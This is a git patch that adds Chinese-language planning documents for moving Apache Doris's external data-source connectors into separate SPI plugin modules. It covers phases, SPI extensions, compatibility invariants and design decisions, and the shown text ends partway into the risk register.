From d8ff6ba86acf57bf2855a0f87630d130f4eeefb8 Mon Sep 17 00:00:00 2001 From: morningman Date: Sun, 24 May 2026 19:55:05 -0700 Subject: [PATCH 001/128] [doc](connector) add project tracking system for catalog SPI migration This multi-month refactor needs persistent state for progress, decisions, risks, and cross-session agent handoff. Establishes a file-based tracking system including dashboard, ADR decision log, deviation log, risk register, per-stage task files, per-connector tracking, and an agent collaboration playbook covering context budget / subagent usage / handoff norms. Closes 18 design decisions (D-001..D-018) and registers 14 risks (R-001..R-014). Co-Authored-By: Claude Opus 4.7 (1M context) --- .../00-connector-migration-master-plan.md | 369 +++++ plan-doc/01-spi-extensions-rfc.md | 1248 +++++++++++++++++ plan-doc/AGENT-PLAYBOOK.md | 280 ++++ plan-doc/HANDOFF.md | 150 ++ plan-doc/PROGRESS.md | 128 ++ plan-doc/README.md | 195 +++ plan-doc/connectors/_template.md | 83 ++ plan-doc/connectors/es.md | 68 + plan-doc/connectors/hive.md | 95 ++ plan-doc/connectors/hudi.md | 81 ++ plan-doc/connectors/iceberg.md | 93 ++ plan-doc/connectors/jdbc.md | 78 ++ plan-doc/connectors/maxcompute.md | 77 + plan-doc/connectors/paimon.md | 77 + plan-doc/connectors/trino-connector.md | 78 ++ plan-doc/decisions-log.md | 260 ++++ plan-doc/deviations-log.md | 74 + plan-doc/risks.md | 306 ++++ plan-doc/tasks/P0-spi-foundation.md | 129 ++ plan-doc/tasks/_template.md | 79 ++ 20 files changed, 3948 insertions(+) create mode 100644 plan-doc/00-connector-migration-master-plan.md create mode 100644 plan-doc/01-spi-extensions-rfc.md create mode 100644 plan-doc/AGENT-PLAYBOOK.md create mode 100644 plan-doc/HANDOFF.md create mode 100644 plan-doc/PROGRESS.md create mode 100644 plan-doc/README.md create mode 100644 plan-doc/connectors/_template.md create mode 100644 plan-doc/connectors/es.md create mode 100644 plan-doc/connectors/hive.md create mode 100644 plan-doc/connectors/hudi.md create mode 100644 plan-doc/connectors/iceberg.md create mode 100644 plan-doc/connectors/jdbc.md create mode 100644 plan-doc/connectors/maxcompute.md create mode 100644 plan-doc/connectors/paimon.md create mode 100644 plan-doc/connectors/trino-connector.md create mode 100644 plan-doc/decisions-log.md create mode 100644 plan-doc/deviations-log.md create mode 100644 plan-doc/risks.md create mode 100644 plan-doc/tasks/P0-spi-foundation.md create mode 100644 plan-doc/tasks/_template.md diff --git a/plan-doc/00-connector-migration-master-plan.md b/plan-doc/00-connector-migration-master-plan.md new file mode 100644 index 00000000000000..e7e15d3527c5d6 --- /dev/null +++ b/plan-doc/00-connector-migration-master-plan.md @@ -0,0 +1,369 @@ +# Connector 迁移总体计划(fe-core/datasource → fe-connector/*) + +> 状态:草案 v1 · 撰写日期 2026-05-24 · 分支 `catalog-spi-2` +> 范围:把 `fe/fe-core/src/main/java/org/apache/doris/datasource/` 下所有"具体数据源"代码(hive/iceberg/paimon/hudi/trino/maxcompute/lakesoul/jdbc/es)解耦到 `fe/fe-connector/*` 下的插件模块;只把"通用基础设施"和"SPI 桥接层"留在 fe-core。 +> 不在范围:BE 端 reader 实现、`fe-fs-spi` 文件系统插件化(已是独立工作流)、`extension-spi`。 +> +> --- +> +> 📍 **当前推进状态、活跃 task、风险等动态信息见 [`PROGRESS.md`](./PROGRESS.md)**(本文件只放战略,不放进度)。 +> 📚 **跟踪机制说明 / 文档索引**:[`README.md`](./README.md) +> 🤖 **Agent 协作规范**(context 管理 / subagent / handoff):[`AGENT-PLAYBOOK.md`](./AGENT-PLAYBOOK.md) +> 📋 **决策日志(D-NNN)**:[`decisions-log.md`](./decisions-log.md) · **偏差日志(DV-NNN)**:[`deviations-log.md`](./deviations-log.md) · **风险登记(R-NNN)**:[`risks.md`](./risks.md) +> 📁 **阶段任务**:[`tasks/`](./tasks/) · **连接器跟踪**:[`connectors/`](./connectors/) + +--- + +## 0. 阅后即明的现状(Recap) + +| 维度 | 状态 | +|---|---| +| SPI/API 模块 | ✅ `fe-connector-api` + `fe-connector-spi` 已建立,依赖只含 `fe-thrift (provided)`、`fe-extension-spi` | +| 反向边界 | ✅ 干净。`fe-connector/**` 下 0 处对 `org.apache.doris.{catalog,common,datasource,qe,analysis,nereids,planner}` 的 import | +| 桥接层 | ✅ `PluginDrivenExternalCatalog / Database / Table / ScanNode / Split`、`ExprToConnectorExpressionConverter`、`ConnectorColumnConverter`、`DorisTypeVisitor`、`ConnectorPluginManager`、`ConnectorFactory`、`DefaultConnectorContext` 已就绪 | +| 已切到 SPI 路径 | ✅ `jdbc`、`es`(见 `CatalogFactory.SPI_READY_TYPES`) | +| 未切到 SPI 路径 | ⏳ `hms`、`iceberg`、`paimon`、`trino-connector`、`max_compute`、`hudi`(仍走 `switch-case`) | +| 旧/新重复代码 | ⚠️ `Jdbc*Client` 13 个方言(fe-core 旧 + fe-connector 新)、`PaimonPredicateConverter`、`McStructureHelper` | +| 反向耦合(要清理)| 96 处 `instanceof XExternal*` 散落在 34 个文件;其中 14 个在 `nereids/`、`planner/`、`alter/`、`tablefunction/` 等热区 | +| 测试 | jdbc=13 个、es=7 个;其余 6 个连接器模块 0 个 | + +--- + +## 1. 总目标与终态 + +### 1.1 终态定义 + +**fe-core/datasource/ 留下什么**: + +- `CatalogIf` / `CatalogMgr` / `CatalogFactory` / `CatalogProperty` / `CatalogLog` —— catalog 注册/调度 +- `ExternalCatalog` / `ExternalDatabase` / `ExternalTable` / `ExternalView` —— 抽象基类 +- `InternalCatalog`、`ExternalMetaCacheMgr`、`ExternalMetaIdMgr`、`ExternalRowCountCache`、`ExternalFunctionRules` —— 跨连接器共享设施 +- `FederationBackendPolicy`、`FileSplit*`、`SplitGenerator`、`SplitAssignment`、`SplitSourceManager`、`NodeSelectionStrategy`、`FileCacheAdmissionManager` —— 通用 split/分发 +- `FileScanNode` / `FileQueryScanNode` / `ExternalScanNode` —— 通用 scan 基类 +- `PluginDrivenExternalCatalog/Database/Table/ScanNode/Split` —— SPI 桥 +- `ExprToConnectorExpressionConverter`、`ConnectorColumnConverter`、`DorisTypeVisitor` —— Doris ↔ SPI 类型/表达式转换 +- `metacache/`、`mvcc/`、`statistics/`、`property/`、`credentials/`、`connectivity/`、`operations/`、`systable/`、`infoschema/`、`test/`、`tvf/` —— 通用框架(**保留**;其中 `property/` 的连接器专属常量需要逐步搬走) +- `kafka/`、`kinesis/`、`odbc/`、`doris/`(Doris-to-Doris federation)—— 暂时保留,不在本计划主线(决策点 D7) + +**fe-core/datasource/ 删除什么**: + +- `hive/`、`iceberg/`、`paimon/`、`hudi/`、`maxcompute/`、`trinoconnector/`、`jdbc/`、`lakesoul/` 整个子目录 +- `fe/fe-core/src/main/java/org/apache/doris/transaction/{Hive,Iceberg}TransactionManager.java`、`TransactionManagerFactory.java` 中的连接器分支 +- `fe/fe-core/src/main/java/org/apache/doris/planner/Iceberg{DeleteSink,MergeSink,TableSink}.java` 等连接器专属 sink/scan-node +- `fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java` 中 line 734–790 的 7 个 `instanceof` 分支 → 收口到 `PluginDrivenScanNode.create(...)` +- 散落在 `nereids/`、`planner/`、`alter/`、`tablefunction/`、`catalog/RefreshManager` 的 `instanceof XExternal*` —— 全部走 SPI 接口 +- `SPI_READY_TYPES` 白名单本身 + +**fe-connector/ 终态**:每个连接器是一个**独立可装卸的 plugin zip**,部署到 `${doris_home}/plugins/connectors//`,FE 启动通过 `connector_plugin_root` 加载。运行时 `fe-core` 对具体连接器名一无所知;用户安装/卸载连接器无需重启 FE(决策点 D8)。 + +### 1.2 三个不可妥协的不变量 + +1. **fe-connector → fe-core 单向依赖**:禁止任何 `import org.apache.doris.{catalog,common,datasource,qe,analysis,nereids,planner}`。允许 `org.apache.doris.thrift.*`(provided)和 `org.apache.doris.connector.*` / `org.apache.doris.extension.*` / `org.apache.doris.filesystem.*`。CI 必须有 grep 守门。 +2. **Image / 元数据持久化向后兼容**:旧 FE image 中保存的 `IcebergExternalCatalog`、`PaimonExternalDatabase` 等 GSON 类型必须能被新 FE 反序列化并平滑迁移到 `PluginDrivenExternalCatalog`。范本是 `PluginDrivenExternalCatalog.gsonPostProcess()` 中对 ES/JDBC 的处理(已有),需推广到所有类型。 +3. **用户可见行为不回归**:`SHOW CREATE CATALOG`、`SHOW TABLE STATUS`、`information_schema.tables`、`EXPLAIN` 输出、错误信息、catalog `type` 字段、`engine` 字段(`getEngine` / `getEngineTableTypeName`)需保留旧名字。已经在 `PluginDrivenExternalTable.getEngine()` 用 switch 兜底,迁移过程中维护这个 switch。 + +--- + +## 2. 现状审视:先解决的 SPI 设计缺口 + +迁移之前必须先把 SPI 补齐到能承载所有六个连接器,否则边迁边补会被反复打回。 + +### 2.1 必须新增的 SPI 能力 + +> 全部加在 `fe-connector-api` 下;保持 `default` 方法策略以让现有连接器零迁移成本。 + +| 能力 | 当前在哪 | 计划新增的 SPI | +|---|---|---| +| **DDL info** —— `CreateTableInfo`/`PartitionDesc`/`DistributionDesc` 等都是 nereids 类型,连接器看不到 | `IcebergMetadataOps.createTable(CreateTableInfo)`、`HiveMetadataOps.createTable(CreateTableInfo)` | 在 `ConnectorTableOps` 增加 `createTable(session, ConnectorCreateTableRequest)`,引入 `ConnectorCreateTableRequest`、`ConnectorPartitionSpec`、`ConnectorBucketSpec` 三个 POJO;fe-core 侧加 `CreateTableInfoToConnectorRequestConverter` | +| **Procedures / Actions** —— Iceberg 10 个 `IcebergXxxAction` 通过 `BaseIcebergAction` 调用 `IcebergMetadataOps.commit*` | `datasource/iceberg/action/*` | 新增 `ConnectorProcedureOps`(`listProcedures`、`callProcedure(name, args)`),fe-core 侧 `ExecuteActionCommand` 走通用 dispatch | +| **元数据失效事件**(HMS notification)—— 21 个 `MetastoreEvent` 类 | `datasource/hive/event/MetastoreEventsProcessor` 调用 fe-core 的 `ExternalMetaCacheMgr.invalidate*` | 选项 A:把 event 处理整体搬到 `fe-connector-hms`,通过 `ConnectorContext.getMetaInvalidator()`(新增)回调 fe-core。选项 B:只把"轮询 HMS 拿事件流"和"解析事件"放连接器,"分发失效"留 fe-core。**推荐 A**(决策点 D4) | +| **事务管理器** | `transaction/HiveTransactionManager`、`IcebergTransactionManager` | 新增 `ConnectorTransactionFactory`(已存在的 `PluginDrivenTransactionManager` 当骨架),把 `HiveTransactionMgr` 内部状态搬进连接器实现 | +| **MVCC 快照** | `IcebergMvccSnapshot`、`PaimonMvccSnapshot` | 新增 `ConnectorMvccSnapshot` 类型,`ConnectorMetadata.beginQuery(session) -> ConnectorMvccSnapshot`;fe-core 侧 `MvccSnapshot` 接口由连接器提供实现 | +| **Vended credentials** | `IcebergVendedCredentialsProvider`、`PaimonVendedCredentialsProvider` | `ConnectorCapability.SUPPORTS_VENDED_CREDENTIALS` 已存在;新增 `ConnectorCredentials getCredentialsForScan(session, ConnectorScanRange)` | +| **Sys-tables / metadata-tables** | `IcebergSysExternalTable`、`PaimonSysExternalTable` | 在 `ConnectorTableOps` 增加 `listSysTableTypes()` / `getSysTableSchema(...)` | +| **Statistics 写入**(`ANALYZE TABLE`)| `HMSExternalTable.createAnalysisTask` | 把 `ExternalAnalysisTask` 改为只调 `ConnectorStatisticsOps`;新增 `setColumnStatistics` 方法 | +| **写路径 sink 配置**(不是数据本身,BE 写)| `IcebergDeleteSink`、`IcebergMergeSink`、`IcebergTableSink` | `ConnectorWriteOps.getWriteConfig` 已存在;扩展为支持 `getDeleteConfig`、`getMergeConfig`;planner 用通用 `PhysicalConnectorTableSink` | +| **Partition 列举**(给 TVF / SHOW PARTITIONS 用)| `MaxComputeExternalCatalog`、`PaimonExternalCatalog`、`HMSExternalCatalog` 各自的 `listPartition*` | 新增 `ConnectorTableOps.listPartitions(session, handle, filter)` / `listPartitionValues(session, handle, columns)` | + +### 2.2 推荐放弃 / 推迟的 SPI 演进 + +- **不要**为 ScanRange 引入更多多态——`PluginDrivenScanNode` extends `FileQueryScanNode` 的桥接策略已经验证可行(ES/JDBC)。 +- **不要**抽象 `Resource` 兼容层——旧 resource-backed catalog 用 `gsonPostProcess` 回填 `type` 已足够。 + +### 2.3 SPI 改动的版本号管理 + +`ConnectorProvider.apiVersion()` 当前固定返回 1。每次 SPI **新增** default 方法不动版本号;每次 SPI **改签名 / 删方法**版本号 +1,`ConnectorPluginManager` 中 `CURRENT_API_VERSION` 同步 +1。本计划过程中只新增 default 方法,因此版本号保持 1。 + +--- + +## 3. 阶段划分(按风险与价值排序) + +``` +┌─────────────────────────────────────────────────────────────────────┐ +│ P0: SPI 缺口补齐(不迁连接器) ~2 周 │ +│ P1: 重复代码清理 + scan-node 收口 ~1 周 │ +│ P2: trino-connector 迁移 ~2 周 最小风险,先打通流程 │ +│ P3: hudi 迁移(含 DLA 重构) ~2 周 │ +│ P4: maxcompute 迁移 ~2 周 │ +│ P5: paimon 迁移 ~3 周 │ +│ P6: iceberg 迁移(含 7 catalog 变体) ~5 周 │ +│ P7: hive (+HMS) 迁移(含 event 引擎) ~6 周 最复杂,最后做 │ +│ P8: 收尾——删 SPI_READY_TYPES、删旧类、删 instanceof ~2 周 │ +└─────────────────────────────────────────────────────────────────────┘ +``` + +总长度估算 **~25 周**(不含 lakesoul / RemoteDoris 等遗留类型清理)。 + +### 3.1 阶段 P0:SPI 缺口补齐 + +**目标**:让 §2.1 表里所有缺口都有对应 SPI 类型/方法在 `fe-connector-api`,且至少一个连接器的现有实现已经能在 `default` 模式下正常工作。 + +**任务**: + +1. 新增 SPI 类型:`ConnectorCreateTableRequest`、`ConnectorPartitionSpec`、`ConnectorBucketSpec`、`ConnectorProcedureOps`、`ConnectorMvccSnapshot`、`ConnectorCredentials`、`ConnectorMetaInvalidator`(在 SPI 包)。 +2. 在 `ConnectorTableOps`、`ConnectorMetadata`、`ConnectorContext` 上新增对应 default 方法。 +3. 在 `fe-core` 侧加 converter:`CreateTableInfoToConnectorRequestConverter`、`ConnectorRequestToCreateTableInfoConverter`(如果需要双向)。 +4. 给 `PluginDrivenExternalCatalog` / `PluginDrivenExternalTable` 加上分发:CREATE TABLE / EXECUTE PROCEDURE / ANALYZE / SHOW PARTITIONS 都路由到 SPI。 +5. 更新 `ConnectorPluginManager` 文档:列出"新 SPI 在 v1 中以 default 方法形式添加,连接器无需更新版本号"。 +6. CI 守门:grep 脚本 `tools/check-connector-imports.sh` 在 `fe-connector/**/*.java` 中扫描禁用 import 列表,作为 maven 的 `enforcer` 步骤。 + +**完成判据**: +- `mvn -pl fe-connector verify` 全绿。 +- JDBC、ES 仍正常(回归)。 +- 一条 fake 连接器(在测试目录下)能在不实现新 SPI 的情况下编译并工作。 + +### 3.2 阶段 P1:重复清理 + scan-node 收口 + +**目标**:在迁连接器之前先把已经造成混乱的旧代码清掉,并把 `PhysicalPlanTranslator` 的 scan-node 分支从 7 个减到 1 个。 + +**任务**: + +1. 删除 fe-core 旧的 `datasource/jdbc/client/Jdbc*Client.java` 13 个文件 + `JdbcFieldSchema.java`。删除前 grep `org.apache.doris.datasource.jdbc.client` 在 fe-core 内被谁引用——预期只有 `JdbcExternalCatalog` 等已经走 SPI 的代码会引用,需要它们也搬走或改路径。 +2. 删除 fe-core 重复的 `PaimonPredicateConverter`、`McStructureHelper`,让 fe-core 通过 SPI 桥接(如果 fe-core 真的需要这两个工具,应该挪到通用工具包;但更可能它们是 leak,可直接删)。 +3. **收口 `PhysicalPlanTranslator.visitPhysicalFileScan`**:把所有 `instanceof HMSExternalTable / IcebergExternalTable / TrinoConnectorExternalTable / MaxComputeExternalTable / LakeSoulExternalTable` 分支统一改为: + - 若 `table instanceof PluginDrivenExternalTable` → 走 `PluginDrivenScanNode.create(...)` + - 兜底(迁移期)保留老分支 + - 在每个连接器迁移完成时(P3–P7)删掉对应分支。 +4. 把 `visitPhysicalHudiScan` 改为内部委托 `PluginDrivenScanNode` 处理增量场景(这里是 `getScanNodeProperties()` 的扩展)。 +5. 把 `LogicalFileScan.computeOutput` 中的 `instanceof IcebergExternalTable` / `HMSExternalTable` 改成通过 `ConnectorMetadata.getTableSchema` 拿额外列(metadata column)。 + +**完成判据**: +- `PhysicalPlanTranslator` 不再 `import` 任何具体 `*ExternalTable` 类(除迁移期 fallback)。 +- 全量回归 P0 通过。 + +### 3.3 阶段 P2:trino-connector 迁移(先开荒) + +**为什么先做它**: + +- fe-core 侧只有 6 个文件 + `source/`,且只有 2 处反向 `instanceof` 引用。 +- fe-connector-trino 已经有 13 个文件,scan/predicate/plugin loader/services provider 都已搬好。 +- 没有 transaction、没有 event、没有 ACID。 +- 失败的爆炸半径最小,可以把整个 migration playbook 跑一遍。 + +**任务清单**(**这套清单就是后续每个连接器都要走的 playbook**): + +1. **代码层面**: + - 把 `datasource/trinoconnector/TrinoConnectorExternalCatalog/Database/Table` 中尚未在 connector 模块中的逻辑搬过去(schema cache、plugin loader 关闭、property 校验)。 + - 在 `TrinoConnectorMetadata` 实现 `getTableSchema` / `listTableNames` / `getTableHandle` / `applyFilter` / `applyProjection`(多数已在)。 + - `TrinoScanPlanProvider` 已实现 `planScan` —— review 一遍 split 数量、Thrift desc 字段。 +2. **桥接层面**: + - `CatalogFactory.SPI_READY_TYPES` 加入 `trino-connector`。 + - `PhysicalPlanTranslator` 删除 `instanceof TrinoConnectorExternalTable` 分支。 + - `PluginDrivenExternalTable.getEngine() / getEngineTableTypeName()` 加 `trino-connector` 分支。 + - 检查 `TableIf.TableType.TRINO_CONNECTOR_EXTERNAL_TABLE` 是否仍需保留作为 GSON 兼容(**保留**,并在 `gsonPostProcess` 中迁移到 `PLUGIN_EXTERNAL_TABLE`)。 +3. **持久化兼容**: + - 在 `PluginDrivenExternalCatalog.gsonPostProcess` 中加 `trinoconnector → plugin` 的 logType 迁移(已有 ES/JDBC 范本)。 + - 在 `ExternalCatalog.registerCompatibleSubtype` 注册 `TrinoConnectorExternalCatalog` → `PluginDrivenExternalCatalog`。 +4. **测试**: + - 给 `fe-connector-trino` 加单元测试(mock Trino plugin),覆盖 schema 解析、predicate 转换、scan plan。 + - regression-test 里新增 `trino_connector_migration_compat` 测试:模拟旧 FE image 反序列化。 +5. **打包**: + - 验证 `mvn package -pl fe-connector-trino` 生成的 `plugin.zip` 内容、`lib/` 排除项是否完整。 + - 文档:在 `docs-next/` 添加 trino-connector 插件安装步骤。 +6. **删除 fe-core 旧代码**(迁移完成的最后一步): + - `rm -rf fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/` + - `CatalogFactory.java` 移除 `case "trino-connector": ...` + - 删除 `import` 失败处全部走 SPI 改造。 + +**风险点**:Trino 插件加载(`TrinoPluginManager` 在连接器内部)要确认 classloader 隔离不会破坏 fe-core 现有 Trino 用法。如果有 BE 端共用 Trino 二进制的情况,需要复核。 + +### 3.4 阶段 P3:hudi 迁移 + +**特殊性**:hudi 没有自己的 `*ExternalCatalog`,它寄生在 HMS 上——表是 `HMSExternalTable.dlaType=HUDI`。 + +**任务**: + +1. **重构 DLA 模型**:在 SPI 层显式建模"一个 HMS 表实际是 hudi 表"。两个选项: + - **选项 A**(推荐):在 `ConnectorTableSchema.tableFormatType` 上做约定值 `HUDI` / `ICEBERG` / `HIVE`,由 HMS 连接器探测后填充;Doris 侧 `PluginDrivenExternalTable` 根据这个值决定走 `PhysicalHudiScan` 还是 `PhysicalFileScan`。 + - **选项 B**:hudi 作为独立 catalog type,但 catalog 内部委托 HMS 连接器拿元数据。 + - 决策点 D5。 +2. **迁移代码**: + - `datasource/hudi/HudiUtils.java`、`HudiSchemaCacheKey/Value`、`HudiMvccSnapshot`、`HudiPartitionProcessor` 搬入 `fe-connector-hudi`。 + - `datasource/hudi/source/` 下的 `HudiScanNode` 删除,改为 `PluginDrivenScanNode` + `HudiScanPlanProvider`(已存在)补全 incremental relation 逻辑。 + - 4 个 `HoodieIncremental*Relation` 类是和 hudi-spark 库交互,必须在连接器模块里(已在 lib),review classpath。 +3. **桥接**:`SPI_READY_TYPES` 加 hudi。但因为 hudi 不能独立 CREATE CATALOG(它依附 HMS),CatalogFactory 路由可能要特别处理:用户写 `type=hms`,由 HMS 连接器自行判断 dlaType 后用 hudi-specific 行为。 +4. **测试**:用 hudi 测试集群跑读时序,确保 incremental query 不回归。 + +### 3.5 阶段 P4:maxcompute 迁移 + +**任务**: + +1. 搬 `MCTransaction`、`MaxComputeExternalMetaCache`、`MaxComputeSchemaCacheValue` 到 `fe-connector-maxcompute`。 +2. 删 fe-core 重复的 `McStructureHelper`(P1 已删,确认)。 +3. `MaxComputeMetadataOps` 现有 fe-core 实现搬到连接器(连接器内已有 `MaxComputeConnectorMetadata` 骨架)。 +4. 收口 `PhysicalPlanTranslator`、`ShowPartitionsCommand`、`PartitionsTableValuedFunction` 中对 `MaxComputeExternalCatalog/Table` 的 12 处 instanceof。 +5. `SPI_READY_TYPES` 加 `max_compute`。 +6. 删 `datasource/maxcompute/`。 + +### 3.6 阶段 P5:paimon 迁移 + +**复杂度跃升原因**: + +- 6 个 catalog flavor(HMS/DLF/REST/File/Base/Factory)—— 在连接器内用工厂模式重组:`PaimonConnectorProvider.create()` 根据 properties 实例化 `Catalog`。 +- `PaimonMvccSnapshot` —— 用 P0 新增的 `ConnectorMvccSnapshot` 类型承接。 +- `PaimonVendedCredentialsProvider` —— 用 P0 新增的 vended credentials SPI 承接。 +- `PaimonSysExternalTable` —— 用 P0 新增的 sys table SPI 承接。 +- BE 通过 JNI 调用 paimon-reader,序列化 Paimon Table 通过 `ConnectorScanPlanProvider.getSerializedTable` 已有支持。 + +**任务**: + +1. 完整 port `PaimonMetadataOps` → `PaimonConnectorMetadata`(注意 partitionStatistics、bucketing)。 +2. Port 6 个 catalog flavor。 +3. 实现 MVCC、Vended、Sys Tables 三套 SPI。 +4. 删 fe-core `PaimonPredicateConverter` 重复(P1 已删,确认)。 +5. 删 fe-core `datasource/paimon/`。 +6. 清 10 处反向 `instanceof PaimonExternalCatalog/Table`。 + +### 3.7 阶段 P6:iceberg 迁移(最大) + +**为什么排第二难**: + +- 7 个 catalog flavor(HMS/Glue/Hadoop/Jdbc/REST/S3Tables/DLF)—— 但 Iceberg SDK 本身就抽象了 Catalog,连接器只要 dispatch property → 选实例化哪个 SDK Catalog。 +- 10 个 `IcebergXxxAction`(`RewriteDataFiles`、`ExpireSnapshots`、`RollbackToSnapshot` 等)—— 用 P0 新增的 `ConnectorProcedureOps` 承接。 +- `IcebergTransaction`(966 行)+ `IcebergMetadataOps`(1247 行)+ `IcebergUtils`(1718 行)+ `IcebergScanNode`(1228 行)= **5 千多行重戏**。 +- `IcebergMvccSnapshot` + snapshot cache + manifest cache —— 用 `ConnectorMvccSnapshot` 承接,cache 由连接器内部管理(决策点 D6)。 +- `IcebergSysExternalTable` + 元数据列(`IcebergMetadataColumn`、`IcebergRowId`)—— 用 sys table SPI。 +- `dlf/`、`broker/`、`fileio/`、`helper/`、`profile/`、`rewrite/` 各子目录都要看清是引擎相关还是用户逻辑。 +- nereids 写命令 `IcebergDeleteCommand` / `IcebergMergeCommand` / `IcebergUpdateCommand` 大量依赖 `IcebergExternalTable` —— 这些要改为通过 `ConnectorWriteOps.beginMerge`、`beginDelete`、`getDeleteConfig` 等 SPI 调用,且 planner 改用 `PhysicalConnectorTableSink`(已存在)。 +- `planner/IcebergDeleteSink.java`、`IcebergMergeSink.java`、`IcebergTableSink.java` 要删除并由通用 sink 承接。 + +**任务分子阶段**: + +- P6.1 元数据 only(catalog flavors + ConnectorMetadata)—— 2 周 +- P6.2 scan path(ScanPlanProvider + MVCC + cache)—— 1 周 +- P6.3 write path(commit/transaction + DML SPI + planner 改造)—— 1 周 +- P6.4 actions(procedure SPI 接上 10 个 action)—— 0.5 周 +- P6.5 sys tables + metadata columns —— 0.5 周 +- P6.6 删除 fe-core `datasource/iceberg/` + 删 13 处反向 instanceof —— 0.5 周 + +**风险**:Iceberg 写路径与 nereids 优化器深度耦合(如 `IcebergConflictDetectionFilterUtils`)。建议在 P6.3 前先单独写一个**写路径方案 RFC**,请 PMC 评审。 + +### 3.8 阶段 P7:hive (+HMS) 迁移(最复杂) + +**复杂度顶点的原因**: + +- HMS 是 hive、hudi、iceberg-hms-flavor、paimon-hms-flavor **共同的元数据后端**。HMS 连接器必须在 P7 之前就稳定可用(事实上 P3/P5/P6 已经在用 `fe-connector-hms`)。 +- 21 个 metastore event 类 + `MetastoreEventsProcessor` —— 用 P0 新增的 `ConnectorMetaInvalidator` 承接(决策点 D4)。 +- `HMSTransaction`(1866 行)+ `HiveTransactionMgr` —— ACID 事务管理,**最难**,需要重写写路径。 +- `HMSExternalTable`(1293 行)—— 处理 hive / hudi / iceberg 三种 dlaType 的分流逻辑。这部分要被 P3、P6.1 的 DLA 模型重构吸收。 +- 31 处反向 `instanceof HMSExternalCatalog / HMSExternalTable`,分布在 `nereids/glue/translator`、`tablefunction/MetadataGenerator`、`AnalyzeTableCommand`、`ShowPartitionsCommand` 等热路径。 + +**任务分子阶段**: + +- P7.1 把 `HiveMetadataOps` 全功能搬到 `HiveConnectorMetadata`(基础 DDL、partition、statistics)—— 2 周 +- P7.2 event pipeline 整体搬到 `fe-connector-hms`,提供 `ConnectorMetaInvalidator` 回调 —— 1.5 周 +- P7.3 HMSTransaction + HiveTransactionMgr 搬到 `fe-connector-hive`,ACID 写路径联调 —— 2 周 +- P7.4 DLA 分流逻辑改造(让 `HMSExternalTable` 退化为可被 PluginDrivenExternalTable 承接)—— 0.5 周 +- P7.5 删除 fe-core `datasource/hive/` + 31 处反向 instanceof —— 0.5 周 + +**风险**: +1. ACID 写路径(INSERT OVERWRITE、INSERT INTO partition)的事务一致性回归——必须有专门的 acid 集成测试。 +2. HMS event 处理的性能:在连接器进程内做事件流处理 vs fe-core 内做有什么差异。 +3. Kerberos UGI 上下文——`ConnectorContext.executeAuthenticated` 现已支持,但要逐条审查。 + +### 3.9 阶段 P8:收尾清理 + +**任务**: + +1. 删除 `CatalogFactory.SPI_READY_TYPES` 白名单 —— 所有 catalog 类型都走 SPI 路径,未找到 provider 的(如 `lakesoul`)按 P8.x 决策处理(直接报错或在 `gsonPostProcess` 中迁移)。 +2. 删除 `CatalogFactory.createCatalog` 中的 `switch-case` 兜底,仅保留 SPI 找不到时的明确错误信息。 +3. 删除 `PluginDrivenExternalTable.getEngine()` / `getEngineTableTypeName()` 中的 switch —— 改为 `Connector` 暴露 `getEngineName()` 这一 SPI 方法。 +4. 删除 fe-core 中尚存的 `TableType.{HMS,ICEBERG,PAIMON,HUDI,MAX_COMPUTE,TRINO_CONNECTOR,LAKESOUL,ES,JDBC}_EXTERNAL_TABLE` 枚举值(保留 `PLUGIN_EXTERNAL_TABLE`)。所有写到 image 的旧值在 `gsonPostProcess` 中自动 reroute。 +5. 文档:在 `fe/fe-connector/README.md` 写明"如何新增一个 connector plugin"的步骤化指南。 +6. CI 守门强化:除 §1.2 的 import 守门,新增"fe-core 不得 import 任何 `*Connector*` 实现包"的 grep。 + +--- + +## 4. 单连接器迁移 Playbook(可复制清单) + +每个连接器迁移,依次走完这 13 步: + +``` +[ ] 1. 列出该连接器在 fe-core/datasource// 下的所有类,按 §1.1 终态分类。 +[ ] 2. 列出 fe-connector-/ 已有类,对照差距。 +[ ] 3. 列出反向 instanceof / cast 调用点(grep `instanceof Xxx | (Xxx)`)。 +[ ] 4. 在 fe-connector-/ 实现缺失的 ConnectorMetadata / ScanPlanProvider 方法。 +[ ] 5. 实现 ConnectorProvider.validateProperties 并补 ConnectorProvider.preCreateValidation。 +[ ] 6. 实现 META-INF/services 注册(多数已就绪)。 +[ ] 7. CatalogFactory.SPI_READY_TYPES 加入该类型。 +[ ] 8. PluginDrivenExternalCatalog.gsonPostProcess 加迁移分支(logType → PLUGIN)。 +[ ] 9. ExternalCatalog.registerCompatibleSubtype 注册 GSON 兼容子类型。 +[ ] 10. 替换所有反向 instanceof:planner / nereids / tablefunction / alter / catalog 各处。 +[ ] 11. PhysicalPlanTranslator.visitPhysicalFileScan 删该连接器分支。 +[ ] 12. 写 / 跑回归测试:单元(fe-connector-/src/test)+ regression-test 中 image 兼容用例。 +[ ] 13. 删除 fe-core/datasource// 整个目录 + 所有未关联 import。 +``` + +--- + +## 5. 决策点(✅ 2026-05-24 全部按推荐确认) + +| ID | 决策内容 | 决议 | +|---|---|---| +| D1 | SPI 是否要支持 SQL 透传以外的远程 query(如 `query()` TVF)? | ✅ 沿用已有 `SUPPORTS_PASSTHROUGH_QUERY` | +| D2 | `PluginDrivenScanNode` 是否长期保持 `extends FileQueryScanNode`? | ✅ 是;JDBC/ES 用 `FORMAT_JNI` 兜底 | +| D3 | 旧 `*ExternalCatalog` 子类的命运? | ✅ **全部删除**,不保留中间形态 | +| D4 | HMS event pipeline 放哪儿? | ✅ **fe-connector-hms** 内,通过 `ConnectorMetaInvalidator` 回调 | +| D5 | hudi/iceberg 在 HMS 上的 DLA 模型? | ✅ **选项 A**:用 `ConnectorTableSchema.tableFormatType` 区分 | +| D6 | Iceberg snapshot/manifest cache 放哪儿? | ✅ **连接器内**,fe-core 不感知 | +| D7 | `kafka` / `kinesis` / `odbc` / `doris` 子目录是否在本计划范围? | ✅ **否**,单独立项 | +| D8 | 生产环境是否允许 "built-in" 连接器(classpath 中带)? | ✅ **否**,只测试用,生产强制目录式插件 | +| D9 | API 版本号何时 +1? | ✅ 本计划范围内**永不 +1**,只新增 default 方法 | +| D10 | `LakeSoulExternalCatalog` 是否删除? | ✅ 在 P8 删除剩余类 | +| D11 | `RemoteDorisExternalCatalog`(Doris-to-Doris)是否做成 connector? | ✅ 长期做,**不在本计划主线** | +| D12 | 用户安装 connector 后是否要求重启 FE? | ✅ 初版**强制重启** | + +--- + +## 6. 风险登记册 + +| ID 